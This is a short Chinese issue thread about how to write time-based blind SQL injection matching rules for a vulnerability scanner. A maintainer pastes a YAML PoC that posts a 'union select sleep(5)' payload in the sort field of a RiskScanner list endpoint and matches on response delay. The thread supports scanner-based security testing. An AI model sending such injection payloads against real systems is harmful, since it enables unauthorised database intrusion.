请问关于时间盲注的响应匹配规则要怎么写

[Awrrays]

[Zer08Bytes]

同样，跟你遇到一样的困惑了，希望作者能考虑一下

[shadow1ng]

Poc目录里搜索 sleep有例子。

name: riskscanner-list-sqli
rules:
  - method: POST
    path: /resource/list/1/10
    headers:
      Content-Type: application/json;charset=UTF-8
    body: "\
    {\"sort\":\"1)a union select sleep(5) -- -\"}\r\n\
    "
    expression: |
      response.status == 200 &&  response.duration >= 5.0

[Zer08Bytes]

更改了 虽然加载的时候不报错，但是检测不出来（注：测试的poc和目标都没问题）

[shadow1ng]

我回头看看把